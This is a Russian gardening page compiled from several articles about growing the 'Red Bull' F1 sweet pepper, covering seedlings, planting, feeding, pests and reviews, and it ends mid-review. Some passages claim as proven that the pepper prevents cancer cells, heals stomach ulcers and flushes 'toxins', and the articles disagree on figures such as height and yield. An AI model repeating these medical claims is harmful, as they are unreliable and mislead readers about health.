4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец красный бык описание фото отзывы

Сочный и урожайный перец «Красный бык» для выращивания необычайно вкусных плодов на своем участке

Болгарский перец — это ценный источник витаминов и минералов. Овощ содержит клетчатку, фолиевую кислоту, кальций, йод, железо и много других полезных компонентов. Чтобы не искать на полках магазинов вкусные и качественные перчики, огородники предпочитают выращивать их самостоятельно на своем участке.

При выборе сортов обращают внимание на вкусовые и товарные качества, требовательность к уходу, устойчивость растений перед непогодой. Один из лидеров — гибрид Красный бык. Рассмотрим его отличительные черты.

Описание перца

Гибрид Красный бык f1 соединил в себе все лучшее: крупные плоды, глянцевую поверхность, мясистую мякоть и универсальность в применении. Выращивают овощ преимущественно на юге и в средней полосе России.

Отличительные черты

Кусты высокорослые, в высоту достигают 1,5 м. Листья средней величины, окрас светло-зеленый. Гибрид среднеранний, созревает за 90–100 дней с момента посадки.

При выращивании в открытом грунте используют рассадный способ. Красный бык имеет высокий иммунитет к распространенным заболеваниям культуры и насекомым-вредителям.

Характеристика плодов и урожайность

Плоды крупные, вес одного варьируется от 200 до 400 г. Окрас насыщенно-красный, поверхность гладкая. Стенки плотные, средняя толщина — 9 мм, из-за чего урожай способен храниться 2-3 месяца без потери вкусовых качеств.

С 1 м2 собирают до 9 кг сладкого перца. Мякоть хрустящая и сочная, умеренно сладкая. Содержит много витаминов, широко используется в кулинарии для приготовления овощных салатов, гарниров и заготовок на зиму.

Интересно! Фолиевая кислота, содержащаяся в мякоти сладкого перца, выводит из организма шлаки и токсины. Витамины группы В служат эффективной профилактикой спадов настроения и бессонницы.

Подготовка в выращиванию

Выращивают перец на супесчаных грядках с низким уровнем кислотности. Лучшие предшественники — зелень, бобовые или лук. Не рекомендуется высаживать гибрид после картофеля или томатов.

В конце октября грядки перекапывают, вносят слой торфа и компоста. С приходом весны перекапывают повторно, разбивают все крупные комки, чистят от листвы, мусора и сорняков. Поверхность почвы должна быть ровная, с четкими междурядьями. Рекомендуемая схема посадки — 70х70. Загущенность снижает урожайность и способствует развитию опасных бактерий. Чтобы понизить кислотность почвы, грунт посыпают смесью сухой древесной золы и извести. Процедуру проводят перед посадкой семян.

Приобретают посадочный материал только в проверенных магазинах. Важно, чтобы упаковка была целая и не истек срок годности. Семена осматривают на наличие внешних дефектов, экземпляры с повреждениями удаляют. Оставшиеся семечки дезинфицируют с помощью борной кислоты или бордоской жидкости. После посевной материал проращивают: помещают во влажную тряпочку и убирают на солнечный подоконник. Это укрепляет иммунитет будущих растений и ускоряет всхожесть.

Интересно! Эффективен и метод проращивания семян в песке. Обеззараженные семена перемешивают с влажным песком в пропорции 1:4. Смесь перекладывают в небольшие емкости и убирают в теплое место. После того как семена проклюнутся, их пересаживают в емкость для рассады вместе в песком.

Выращивание рассады

Выращивать рассаду рекомендуется в торфяных таблетках или горшочках. Такие емкости недорого стоят и продаются в любом магазине для огородников. Торфяные таблетки удерживают влагу, легки в использовании. Если возможности приобрести емкости нет, используют картонные пакеты из-под молока, цветочные горшки, пластиковые стаканчики. Главное — предварительно помыть тару и протереть чистым полотенцем.

В качестве почвы берут землю с огорода, перемешанную с покупным грунтом. Для надежности состав дезинфицируют с помощью раствора марганцовки, чтобы убить опасные бактерии и возбудители болезней. Рекомендуется добавить речной песок или древесные опилки.

Природные компоненты служат отличным разрыхлителем и удерживают влагу в почве. Перед посадкой семян грунт насыпают в емкость и обильно поливают. Далее делают небольшие ямки на расстоянии около 2 см друг от друга. В каждую помещают семя, присыпают сверху землей. Держат рассаду в теплом месте.

Почва всегда должна быть чуть влажной, пересыхание недопустимо. Для полива используют пипетку, чтобы вода попадала прямо под основание стебля. Когда появятся первые листочки, вносят жидкие органические удобрения, например, куриный помет или раствор на основе древесной золы. При недостатке света и тепла перцы ставят под люминесцентные лампы, чтобы ускорить развитие. Перед посадкой в огород рассаду обильно поливают.

Важно! При стремительном росте организуют пикировку. Процедура необходима, чтобы обеспечить здоровое развитие корневой системы. Со временем корни становятся больше, им требуется более просторная емкость. Саженцы аккуратно вынимают и пересаживают в другую тару с новым обеззараженным грунтом. При пикировке рекомендуется действовать осторожно, без спешки, чтобы не повредить еще хрупкие стебли и листочки.

Посадка

Высаживают рассаду перца на заранее подготовленные грядки в безветренное и пасмурное утро. Саженцы аккуратно вынимают из емкости, оставляя на корнях комок мокрой земли, помещают в ямки на грядке, присыпают и прихлопывают ладонью.

Рекомендуется в первую неделю накрыть каждое растение полиэтиленовым мешком или пленкой. Это защитит ростки от дождей, ветров и возможных заморозков. В дальнейшем гибрид нуждается в подвязке, поэтому возле каждого куста заранее устанавливают деревянный колышек.

Дальнейший уход

Основа любого ухода — своевременный и регулярный полив. Увлажняют гибрид 1 раз в 5-6 дней, на 1 кустик уходит около 1,5 л воды. Если лето жаркое и дождливое, количество поливов сокращают. Перед процедурой грядки рыхлят, чтобы улучшить качество почвы и задержать влагу в земле. Оптимальная глубина рыхления — 10–15 см.

Подкармливают растение 3-4 раза за период созревания. Первую подкормку организуют через 2 недели после высадки на участок. В качестве удобрений используют навозную жижу, древесную золу, суперфосфат, аммиачную селитру.

Рекомендуется чередовать минеральные и органические удобрения. Также не обойтись без внекорневых подкормок. Для укрепления иммунитета растения опрыскивают раствором молочной сыворотки или бордоской жидкостью.

Особенности выращивания и возможные трудности

Высокорослое растение нуждается в обязательной подвязке. Стебли у перца очень хрупкие, поэтому могут сломаться под тяжестью созревших плодов. Чтобы не допустить этого, каждую скелетную ветвь подвязывают к опоре отдельно. Важно перед процедурой протереть колышки обеззараживающим раствором.

Получить богатый урожай невозможно и без формирования куста. Слишком длинные побеги и ветви укорачивают садовыми ножницами, а верхушку прищипывают. Если этого не сделать, плодов будет много, не всем не хватит сил для развития, и перчики останутся маленькими.

При выращивании овоща в теплице соблюдают ряд важных правил:

  1. Регулярно проветривают сооружение, открывают двери и форточки.
  2. Поливают кустики строго под корень, расходуя на каждый по 1-2 л воды.
  3. Окучивают и рыхлят междурядья, чтобы предотвратить появление насекомых.
  4. В период цветения кустики встряхивают, чтобы активизировать опыление.

Характерные болезни и вредители

Болезни появляются из-за несоблюдения правил севооборота, неправильного ухода, зараженной земли. Чтобы предотвратить появление заболеваний, рекомендуется соблюдать режим полива и подкормок, использовать проверенных производителей семян.

Каким болезням подвержен перец Красный бык:

  1. Корневая гниль поражает кусты еще на стадии развития рассады. При этом на корнях появляется белый налет. Для лечения используют препарат «Топаз» или «Квадрис».
  2. Мучнистая роса проявляется в виде белого надета на листьях и стебле. Если вовремя не предпринять меры, плоды деформируются, теряют упругость. Для борьбы с болезнью используют раствор медного купороса или древесную золу.
  3. Табачная мозаика возникает из-за зараженной почвы и жаркого лета. Листья покрываются желто-коричневым узором. Для лечения используют препарат «Кемира» или опрыскивание средством «ХОМ».

Из вредителей отмечают проволочников, слизней, белокрылок и колорадских жуков. Отличное профилактическое средство от них — регулярная прополка грядок и удаление сорняков.

Рекомендуем периодически осматривать кустики на наличие вредителей. Чтобы избавиться от насекомых, используют профессиональные средства: «Тайфун», «Вектра», «Максим».

Преимущества и недостатки сорта

У гибрида Красный бык отличный иммунитет перед холодной и дождливой погодой. Также отмечают следующие преимущества:

  • высокая урожайность;
  • сладкая и мясистая мякоть;
  • возможность выращивать как в открытом грунте, так и в теплице;
  • устойчивость перед болезнями и вредителями.

Из недостатков отмечают необходимость в подвязке и формировании куста. Многие гибриды не нуждаются в этих процедурах.

Схожие виды

У Красного быка есть «братья» — перцы Желтый бык и Оранжевый бык. Среднеранний Желтый бык — это гибрид с крупными перчиками насыщенного желтого окраса. Форма усеченная, слегка вытянутая. Масса плода варьируется от 200 до 300 г, средняя длина — 20 см. Мякоть сочная и толстая, кожица тонкая. Выращивают овощ в теплых регионах страны.

Оранжевый бык имеет оранжево-коричневый окрас. Созревает за 100–110 дней. Вкус сочный, без горечи. Кожура плотная, поэтому урожай способен храниться 2-3 месяца без потери вкусовых и товарных качеств. Отлично подходит для приготовления блюд и употребления в свежем виде.

Важно! Агротехника выращивания у всех перцев одинаковая. Главное — вовремя поливать и удобрять грядки, рыхлить грунт и удалять сорняки.

Отзывы

Одни огородники высаживают на своем участке только гибрид Красный бык, другие предпочитают менее прихотливые в уходе сорта. Изучим несколько отзывов опытных дачников.

Ольга, г. Саратов: «Перец Красный бык — это отличный гибрид. Мне он нравится из-за сочности и сладости. Использую для приготовления зимних заготовок. Блюда получаются аппетитными и полезными!»

Ирина, г. Уфа: «Высаживаю гибрид только в теплицу. Поливаю ранним утром, чтобы не было солнечных ожогов. Удобряю суперфосфатом и золой. Урожайность хорошая, с одного куста собираю до 3 кг».

Михаил, г. Москва: «Гибрид Красный бык в прошлом году заболел мучнистой росой. Вылечить удалось, однако 80% урожая погибло. Больше высаживать его не буду, пробую более устойчивые к заболеваниям овощи».

Заключение

Высокоурожайный перец Красный бык назван так неслучайно: насыщенные алые плоды вырастают крупными и тяжелыми. Высокорослые кусты из-за этого нуждаются в своевременной подвязке, которую обеспечивает заранее подготовленная опора.

Высаживают овощ на светлых и солнечных участках. Лучшие предшественники — бобовые или зелень. Поливают по мере высыхания земли, на один кустик расходуют около 1,5 л воды. Собирают в середине августа, срывают перчики вместе с плодоножкой. Благодаря плотной кожуре урожай долго хранится. В применении перец универсален, подходит для закусок, запеканок, салатов и супов.

Перец Красный бык

Тем, кто желает на своем участке выращивать вкусный, крупный болгарский перец, следует обратить внимание на сорт «Красный бык». Этот крупноплодный гибрид отличается превосходным вкусом мякоти, сочностью, высокой урожайностью и прочими достоинствами. Выращивают перец «Красный бык» в средней и южной полосе России на открытых грунтах и в парниках, теплицах. Для сорта присущи общие правила и некоторые особенности культивирования, о которых можно узнать в приведенной статье.

Описание

Отличительной чертой гибрида является плод огромного размера. Его длина составляет примерно 20 см, усредненная масса 200-250 г. Однако в некоторых случаях вес перцев достигает 400 г. Форма овоща удлиненно цилиндрическая. Его окраска до наступления технического созревания – зеленая, по достижению спелости – ярко-красная. Стенки перца толстые, до 10 мм. Внутренняя полость имеет 3-4 камеры с небольшим количеством семян. Поверхность плода глянцевая, покрыта тонкой, нежной кожицей. Увидеть фото перца «Красный бык» можно на фото ниже.

Вкусовые характеристики сорта «Красный бык» превосходные: мякоть сочная, сладкая, ароматная, в меру плотная. В микроэлементный состав перца входит большое количество витаминов группы В, С, Р, РР, а также комплекс минеральных солей, что делает овощ не только очень вкусным, но и полезным.

Потребляют перец в свежем, консервированном виде, в составе кулинарных блюд. Зачастую овощ включают в меню диетического питания. Он рекомендован людям, страдающим сахарным диабетом, заболеваниями желудочно-кишечной системы, гипертонией и некоторыми иными недугами.

Особенности агротехники

Сорт перца «Красный бык F1» выращивают рассадным методом. Семена на рассаду рекомендовано высевать в марте. Предварительно их следует прорастить, поместив во влажную среду (мокрую ткань, марлю) с температурой +25-+27 0 С. Семена проклевываются через 5-10 суток, после чего их высевают. Грунт для выращивания рассады должен быть рыхлым, питательным. Для его создания можно смешать огородную землю с торфом, перегноем, опилками. При необходимости готовый почвенный состав можно приобрести в специализированном магазине. В качестве емкостей для культивирования растений могут выступать небольшие пластиковые либо торфяные горшочки.

После появления всходов, перцы следует поместить в менее теплую среду с температурой + 22-23 0 С. При этом рассада требовательна не только к температурному, но и световому режиму. Поэтому опытные огородники «подсвечивают» молодые растения лампами дневного света. Оптимальная продолжительность светового периода составляет 12 часов в сутки.

Полив молодых растений следует осуществлять регулярно, по мере высыхания грунта. Подкормку рекомендовано проводить каждые 2 недели. В качестве удобрения можно использовать специальные комплексные составы, содержащие азот и калий.

Выращивать перцы сорта «Красный бык» можно в открытом и защищенном грунте. При этом использование парника либо теплицы позволяет ускорить процесс плодоношения и увеличить урожайность культуры. Пикировать перцы в парник можно в начале мая, для открытого грунта лучшим временем для высаживания растений является начало июня. Возраст рассады на момент пикировки должен составлять 45-55 суток.

Кусты гибрида «Красный бык» сильнорослые, раскидистые. Их высота достигает 1 м. Поэтому, как только молодые растения прижились, их необходимо начать формировать, прищипнув макушку верхнего побега. В процессе роста на кусте удаляют мелкие пасынки, оставляя 5-6 основных плодоносящих ветвей.

Почву по периметру ствола следует периодически пропалывать и рыхлить. При этом обязательно нужно помнить, что корни перцев расположены в верхнем слое грунта на глубине 5 см от поверхности земли. Именно поэтому глубокого рыхления, которое может повредить корни, следует избегать. Мульчирование рыхлой почвы поможет предотвратить активный рост сорных трав и чрезмерное пересыхание грунта.

Массовое созревание перцев сорта «Красный бык» начинается через 110-125 суток от дня высевания семени на рассаду. При этом первые перцы можно попробовать на несколько недель раньше.

На каждом растении сорта «Красный бык» в период активного плодоношения может образовываться от 20 до 30 крупных перцев одновременно, поэтому куст необходимо обязательно подвязывать. Для этого можно использовать шпалеру.

Многочисленные положительные отзывы перец «Красный бык» получает от опытных земледельцев, которые почитают этот сорт не только из-за превосходного вкуса крупных плодов, но и высокой урожайности. Так в условиях открытого грунта с 1 м 2 можно получить 7-9 кг овощей. При выращивании в условиях парника либо теплицы этот показатель может быть увеличен до 12-15 кг/м 2 . Фото перца «Красный бык» и отзывы о нем можно видеть в приведенной статье.

Отзывы

Гибрид любим многими огородниками. Они же зачастую обмениваются опытом и отзывами о перце «Красный бык», выкладывают фото своего успешно выращенного урожая и снимают видео, на котором отображен процесс выращивания. Так, видеть реальный урожай перцев и услышать отзывы о нем «из первых уст» земледельца можно на видео:

Перец сорта «Красный бык» заслуживает особого внимания опытных земледельцев и начинающих огородников. Он дает возможность каждому из них получить богатый урожай вкусных, крупных перцев без особых усилий и специальных знаний. Урожай красных овощей этого гибрида станет не только вкусной пищей, но и натуральным источником витаминов и минералов. Высокая урожайность сорта позволяет лакомиться свежим овощем на протяжении всего лета и в зимний период в консервированном виде.

Перец «красный бык»: отзывы, фото, описание сорта

Перец является очень теплолюбивой культурой, поэтому в нашей стране, особенно севернее Воронежской и Белгородской областей, его выращивают только рассадой. В домашних условиях ее удобнее всего получать на подоконниках. Вообще, сладкий перец — это популярное на огородах россиян растение. Поэтому естественно, что каждый садовод стремится возделывать его высокоурожайные сорта, имеющие крупные мясистые плоды. И один из них – перец «красный бык».

Описание

Его плоды могут вырастать в длину до тридцати сантиметров и иметь вес до четырехсот грамм. Широкий и толстостенный перец «красный бык», отзывы об урожайности которого только положительные, имеет ярко красный цвет. При соблюдении агротехнических условий кустики его настолько обильно усыпаются плодами, что их приходится даже подвязывать: в противном случае они могут упасть или даже сломаться. Опытные огородники хорошо знают, что практически все остальные сорта в такой поддержке не нуждаются.

Перец сладкий «красный бык», отзывы о котором свидетельствуют, что он отлично растет как в закрытом, так и открытом грунтах, относится к сильнорослым подвидам. Куст этого растения может вырастать до полутора метров. Он относится к сортам со средним сроком созревания.

В средней полосе и севернее его выращивают только рассадным способом. При этом плоды могут завязываться даже при плохом освещении, например в теплицах. Сорт характеризуется высокой лежкостью.

Перец «красный бык», отзывы о котором только положительные, обладает генетической устойчивостью ко многим болезням, например к картофельному вирусу или табачной мозаике.

Урожайность

Это овощная культура с одного квадратного метра может давать до девяти килограммов сочных плодов. Многие из тех, кто пробовал выращивать такой красный перец, отзывы свои оставляют для тех, кто впервые сталкивается с этим растением. Поэтому стоит прислушаться к мнению опытных огородников, которые считают, что урожай лучше собирать еще на стадии технической спелости, когда цвет плодов — светло-зеленый. В противном случае кусты могут не выдержать достаточно большой нагрузки, к тому в дальнейшем повышается риск поражения растения вредителями.
А до сочного красного цвета, означающего биологическую спелость, плоды дозреют уже в процессе хранения.

Особенности выращивания

Многие сегодня останавливают свой выбор именно на таком сорте, как перец «красный бык». Описание этого растения и особенностей ухода, его фото, как правило, имеются на упаковке семян. Выращивая этот сладкий перец, огороднику необходимо внимательно следить, чтобы в грунте под кустом не было бы избытка азота, в противном случае растение начнет сбрасывать цветы или завязи.

Перец «красный бык» считается гибридом F1, а это означает, что для заготовки его семена не годятся. Иначе «потомки» могут иметь нехарактерные для сорта свойства, другой внешний вид, худшую урожайность и самое главное — иной вкус. Для рассады семена лучше покупать в магазине. Это может быть перец «красный бык» «Гавриш», отзывы о котором, оставленные покупателями, свидетельствуют о том, что он отлично прорастает как под временным пленочным укрытием, так и в открытом грунте.

Требования к почве

Грунт, на котором выращивают рассаду, должен быть рыхлым и влагоемким, с достаточным количеством питательных веществ и нейтральной реакцией. Кроме того, он должен быть чист от вредителей или возбудителей различных болезней.

Как правило, почву для рассады готовят из двух частей огородной земли, по одной — перепревшего навоза и древесной золы, торфа и опилок. Иногда вместо последних добавляется зернистый песок. Вообще, опытные огородники для перца землю берут с тех участков, на которых в течение последних трех-четырех лет не высаживались пасленовые культуры — томаты, баклажаны, физалис или картофель.

Перец «красный бык» НК F1 достаточно чувствителен к уровню кислотности, а также к содержанию солей в грунте. Для этого в рассадную почву нужно вносить доломитовую муку или известь из расчета двадцать граммов на один килограмм земли.

Посев семян

Отзывы об этом растении в большинстве своем только положительные. Поэтому практически на каждом втором участке можно увидеть кусты этой сильнорослой, индетерминантной овощной культуры. Однако для того, чтобы получить хороший урожай, нужно соблюдать определенные агротехнические условия, и в первую очередь это касается рассады. Чтобы избавиться от вирусной или грибной инфекции, семена перед высадкой нужно протравить в двухпроцентном растворе марганцовки в течение двадцати минут при комнатной температуре. Затем их нужно промыть в холодной воде. Для ускорения прорастания многие замачивают их в питательных растворах. После семена на два дня нужно завернуть во влажную ткань и поместить в полиэтиленовый пакет, для того чтобы они не подсохли. Оптимальной для прорастания перца «красный бык» считается температура от 22 до 24 градусов тепла. В средней полосе нашей страны самые лучшие сроки посева семян на рассаду — конец февраля – начало марта.

Полезные качества

Перец «красный бык» содержит каротин и почти все витамины из группы В. В его плодах есть также эфирные масла, полезные сахара и азотистые вещества. Ученым удалось также обнаружить в сочных овощах калий с натрием, кальций, фосфор, железо, серу и кремний. Считается, что содержащиеся в «красном быке» витамин С и бета-каротин помогают предотвращению образования раковых клеток. Кроме того, этот овощ лечит язву. Такой богатый список полезных веществ в сочетании с прекрасным вкусом и стал причиной того, что многие на своих участках стремятся выращивать именно перец «красный бык».

Отзывы

Фото этой овощной культуры – доказательство того, что это сладкий сорт. Многие сажают ее на своих огородах, основываясь на отзывах тех, кто уже хорошо знаком с этим перцем. Отличный вкусный сорт с сочными плодами, имеющими толстые стенки – вот как отзываются об этом растении отечественные садоводы. Крупный овощ, доходящий до ярко-красного цвета уже после сборки урожая, радует своим крупным размером и приличным весом. В некоторых отзывах говорится, что в средней части нашей страны на огороде он вырастает до четырехсот пятидесяти грамм. Неприхотливый перец «красный бык» отлично подходит как для использования в салатах или в фаршировке, так и для употребления просто в чистом виде — как кладезь витаминов.

Кусты этого сорта долго плодоносят и хорошо хранятся. Если следовать инструкции, то семена под рассаду прорастают уже на пятый день. «Красный бык» имеет отличный вкус, и хотя он завязывается позже раннеспелых подвидов и на кусте меньше плодов, чем у последних, однако он выигрывает по общему весу урожая с каждого куста, что немаловажно.

Сейте — не пожалеете

Во многих отзывах говорится, что семена всходят практически все. И даже при поздних сроках высаживания их в грунт можно собрать вполне неплохой урожай, в некоторых случаях доходящий до двенадцати килограммов с одного квадратного метра.

Многим нравится и необычно большая высота куста, что же касается плодов, то они отлично смотрятся в салатах. Для домашних заготовок их обязательно нужно разрезать, поскольку большой размер не дает полностью поместить овощ в банке.

Этот ярко-красный гибрид перца очень нравится тем, кто предпочитает крупногабаритные культуры. Многие огородники не только не пожалели о том, что высадили на своем участке перец «красный бык» (отзывы это доказывают), но и собираются сделать это и в последующие годы.

Перец Красный бык

Огородники, которых привлекают крупные перцы, часто обращают внимание на гибрид Красный Бык. Он не только привлекательно смотрится на грядке, удивляя многих своими размерами, но и отличается отменными вкусовыми характеристиками. Отзывы дачников подтверждают, что ухаживать за Красным быком легко.

Описание

Многие владельцы приусадебных участков опасаются покупать семена крупных перцев, Беспокоясь о возможных сложностях при уходе. Перец сорта Красный бык отличается от многих видов тем, что сложностей при выращивании не возникает практически ни у кого.

Плодоносит перец Красный Бык при выращивании в тепличных условиях и в незащищенном грунте. Но без пленочных укрытий его лучше растить лишь в южных регионах. В грунт агрономы рекомендуют высаживать рассаду, по отзывам специалистов так можно получить максимальный урожай.

Гибрид относится к высокорослым. Растения вырастают до 1,5 м в высоту, их необходимо обязательно подвязывать. Ведь под весом тяжелых крупных плодов они могут поломаться или упасть.

Описание перца сорта Красный бык:

  • урожайность с 1 м 2 достигает 9 кг;
  • ранне-средний период созревания;
  • плоды завязываются даже в зимних теплицах в условиях слабого освещения;
  • генетическая устойчивость к поражению картофельным вирусом и вирусом табачной мозаики;
  • листва пышная, темно-зеленого цвета.

От момента появления массовых проростков семян до технически спелых плодов проходит не менее 95 дней. Для полного вызревания требуется больше времени, но специалисты советуют собирать плоды, не дожидаясь, когда они станут красного цвета.

К моменту достижения биологической зрелости существует риск, что растения не выдержат веса перцев Красный Бык. Отзывы с фото подтверждают, что собранные зеленые плоды приобретают насыщенный красный цвет за 4-5 дней хранения.

Характеристики плодов

Посмотрев на фото перца Красный бык, почитав отзывы о гибриде, многие дачники не могут дождаться момента, когда их плоды полностью сформируются.

  • длина перца 20 см (некоторые экземпляры дорастают до 30 см);
  • масса 200-250 г (отзывы подтверждают, что при соблюдении агротехнических условий можно получить плоды весом до 400 г);
  • цвет насыщенный ярко-красный;
  • поверхность глянцевая;
  • кожура нежная, тонкая;
  • мякоть ароматная, плотная, сочная;
  • стенки толщиной 10 мм;
  • форма кубообразная;
  • во внутренней полости 3-4 камеры;
  • количество семян небольшое.

Такое описание привлекает многих дачников, которые любят видеть на грядках интересные крупноплодные перцы.

Употреблять Красный бык можно в свежем виде также используют его для замораживания, термообработки, консервирования. Он подходит для включения в рацион маленьких детей и людей, больных сахарным диабетом. Перец считается кладезем витаминов группы В, С, РР и минеральных веществ.

Рассада из семян

Получить максимальный урожай можно при соблюдении установленных агротехнических условий выращивания. Лучше всего семена перца Красный бык F1 на рассаду высевать в марте.

Предупредить возможные бактериальные и вирусные инфекции помогает дезинфекция семян в марганцовке. Следует сделать 2% раствор и замочить семена на 20 минут. После дезинфекции они промываются холодной водой.

Обеспечить 100% всхожесть можно, если предварительно прорастить семена. Для этого их помещают во влажную ткань или марлю на 3-5 дней и обматывают полиэтиленом, чтобы сохранить влагу. Оптимальной температурой для прорастания считается 24-27 0 С.

Семена высевают в питательную рыхлую почву. Ее можно сделать самостоятельно, смешав с опилками, перегноем и торфом обычную огородную землю. Но опилки следует предварительно обработать мочевиной. Купить подходящую для выращивания семян почву можно в магазине.

После появления всходов температуру понижают до 20 0 С на 2-3 дня. Затем ее вновь поднимают до 22-25 0 С. С помощью искусственного интенсивного света необходимо обеспечить для рассады 12-часовой световой день. Спустя указанный промежуток времени, рассаду закрывают светонепроникаемым материалом. Излишняя освещенность приводит к вытягиванию рассады и снижению урожайности.

Для полноценного развития рассады требуются подкормки. Удобрять растения следует каждые 2 недели. Используют азотистые и калийные комплексы. Агрономы рекомендуют раз в 10 дней опрыскивать растения раствором «Эпина». Он предупреждает возможные проблемы из-за слабой освещенности. Также используют стимулятор корнеобразования гуамат калия: для полива делается раствор из 25 мл концентрата и 10 л воды.

При выращивании рассады перца Красный бык семена советуют сразу высеивать в индивидуальные емкости. Растение плохо переносит пикировку, ведь корневая система перцев плохо восстанавливается. Отсутствие пикировки позволяет сократить время выращивания рассадного материала на 15 дней.

Выращивание перца

В грунт подращенные растения пересаживают в возрасте 50-65 дней. В теплицы и под пленочные укрытия их высаживают в мае. Срок пересадки в открытый грунт зависит от региона выращивания. Оптимальным периодом является начало июня, но перец Красный бык на юге можно выращивать в незащищенном грунте с середины мая. Обязательным условием является отсутствие заморозков и прогревание грунта до 15 0 С на глубине до 10 см.

Улучшить приживаемость рассады позволяет обильное поливание лунок горячей водой. При пересаживании необходимо следить, чтобы не повредилась корневая система. Поэтому специалисты советуют делать перевалку растений: их высаживают в лунки вместе с грунтом, в котором они росли.

Регулировать высоту растений позволяет прищипывание макушки верхнего побега. Кусты гибрида Красный бык получаются большими, раскидистыми. Чтобы у растений оставались силы на формирование крупных плодов, желательно ограничить их рост. Повысить урожайность и размер перцев можно, если проводить пасынкование растений. Оставить необходимо 5-6 ветвей, которые будут плодоносить. Остальные побеги удаляют.

Подкормка растений является обязательной. За весь период выращивания после перемещения рассады в грунт это делается 3-4 раза. Вносят суперфосфат, древесную золу, хлористый калий. В период плодообразования используют раствор птичьего помета и коровяка. В начале плодоношения можно добавить аммиачную селитру.

Одним из обязательных условий выращивания является периодическая прополка и рыхление грунта. Следует помнить, что корни растений находятся близко к поверхности, поэтому глубокое рыхление нежелательно. Если заглубляться в почву более чем на 5 см, то можно их повредить.

Предупредить появление сорняков, быстрое пересыхание грунта и избежать необходимости постоянного рыхления почвы позволяет мульчирование. Вокруг кустов раскладывают солому, опилки, шелуху семечек.

Узнать об особенностях выращивания перца Красный бык можно из описания сорта. В нём говорится, что при активном плодоношении на каждом кусте может формироваться более 20 крупных плодов одновременно. Поэтому подвязка кустов является обязательной. Проще всего для этого использовать шпалеру.

В теплицах при своевременных подкормках, проветриваниях и соблюдении теплового режима урожай достигает 12 кг с каждого метра квадратного, некоторым удается собирать даже по 15 кг. Но рассчитывать на рекордный урожай не приходится, если перед перцем в грунте росли пасленовые культуры (картофель, баклажаны, томаты).

Перец «Красный бык»: характеристика и описание сорта (фото)

«Красный бык» – новый сорт красного перца, в котором объединена высокая урожайность, простота выращивания и скороспелость. Как известно, перец – теплолюбивое растение, поэтому «Красный бык» лучше всего выращивать в теплицах или на подоконниках дома. Учитывая суровый российский климат, большинство огородников выращивают красный перец только рассадой.

Куст растения может достигать высоты 150 см. Перец «Красный бык» даёт настолько богатый урожай, что стебель кустика может упасть и сломаться под весом плодов, поэтому их следует подвязывать. Плоды «Красного быка» действительно огромны – они могут достигать длины 15-30 см и ширины 9-12 см! Средний вес плода составляет 250-400 гг. Кожура плодов толстая (до 1 см). Цвет плодов на стадии дозревания варьируется от светло-зелёного до тёмно-зелёного, а в период полного созревания плод имеет ярко-красный окрас. Плоды сочные и сладкие.

Выращивание

Опытные огородники знают, что перец – растение короткого дня, то есть чем короче световой день, тем плоды больше и вкуснее. «Красный бык» – не исключение. Кроме того, он не нуждается в ярком освещении, что является его огромным плюсом при выращивании в теплицах.

Требования, которые выдвигаются к грунту, на котором будет расти перец:

  • нейтральная реакция среды;
  • отсутствие ионов азота (в случае присутствия азотистых веществ растение станет плохо завязывать цветы и, соответственно, меньше давать плодов);
  • рыхлость;
  • влажность;
  • оптимальное количество питательных веществ;
  • отсутствие личинок вредителей и патогенных микроорганизмов.

Для того чтобы семена быстрее росли, грунт для рассады готовят следующим образом. Необходимо взять в равных пропорциях землю с огорода и навоз (или другие натуральные удобрения, в состав которых входят питательные вещества, необходимые для развития перца). Лучше, если земля будет взята с тех участков, где ранее не росли другие представители семейства Паслёновых (например, картофель, помидоры, баклажаны и т. д.).

Обратите внимание! Во время покупки семян «Красного быка» на упаковке вы найдёте приписку после названия – «F1». Это означает, что данный вид – гибрид. На вкус и пользу продукта это никак не влияет, но гибриды нельзя заготавливать, то есть нельзя из семян гибридов выращивать новые растения. Такие «потомки» могут иметь плохой товарный вид и неважный вкус.

Как улучшить урожай

С целью уберечь урожай от некоторых заболеваний, а также повысить урожайность, соблюдайте такие правила:

  1. Перед высадкой семян в грунт, их следует окропить 2 % раствором марганцовки, которая наделена бактерицидными свойствами. Такая процедура позволяет уберечь растения от вирусных и грибковых инфекций. Раствор должен быть тёплым. После орошения семена промыть холодной водой.
  2. Чтобы семена быстрее всходили, их необходимо положить во влажный платок, смоченный подогретым питательным раствором, и хранить их в полиэтиленовом пакетике, где семена будут сохнуть.
  3. Рассаду лучше всего держать при комнатной температуре (22-240С).

Высевать семена на рассаду лучше всего в период с конца февраля по начало марта. Семена под рассаду прорастают на пятый – седьмой день.

Пикировать в отдельные горшочки следует не раньше появления 1-2 настоящих листочков. После того как сеянцы пересадили в открытый грунт, боковые побеги и листья следует удалить, а сам кустик подвязать.

Высаживать саженцы следует на глубину 2-4 см (где-то на половину пальца вглубь) с расстоянием между саженцами 20-40 см.

Совет! «Красный бык», как уже говорилось выше, даёт очень большой урожай: 7-9 кг плодов с одного метра квадратного земли. Учитывая этот факт, рекомендуется собирать плоды ещё на стадии созревания, когда они уже приобрели окончательные форму и размер, но по-прежнему имеют светло-зелёный окрас. Не волнуйтесь! Плоды «Красного быка» длительный период хранятся и смогут дозреть дома – на подоконнике или возле окна. В этом случае важно, чтобы перец получал достаточное количество света.

Преимущества и недостатки

Итак, теперь давайте подытожим все плюсы и минусы перца «Красный бык».

  • быстрое созревание плодов;
  • плоды мясистые, сочные, большие и сладкие;
  • сорт лёгкий в выращивании (не нуждается в ярком освещении и длительном световом дне; нет необходимости во внесении минеральных удобрений и т. д.);
  • стойкий к большинству болезней Паслёновых.
  • нуждается в подвязке;
  • выращивается только рассадным способом;
  • требует высокой чистоты грунта.

Полезные качества и место в медицинской отрасли

В результате исследований, учёные пришли к выводу, что в состав перца «Красный бык» входят такие полезные для организма человека вещества, как:

  • большинство витаминов группы В (тиамин, фолиевая кислота и т. д.);
  • аскорбиновая кислота (витамин С);
  • каротин (провитамин; при взаимодействии с жирами превращается в витамин А);
  • эфирные масла;
  • углеводы;
  • азотистые вещества;
  • минеральные вещества: натрий, калий, кальций, ферум, сульфур, силиций, фосфор.

А также в результате исследований было доказано, что каротин и витамин С, которые входят в состав «Красного быка», предотвращают развитие раковых клеток и способствуют заживлению язв желудка.

Отзывы

Кристина из Воронежа посадила семена «Красного быка» и поделилась с нами такой информацией, что практически все семена взошли. И хотя это не раннеспелый подвид, огородница успела собрать богатый урожай, который составил 8 кг с одного квадратного метра.

Ирина из Тольятти:

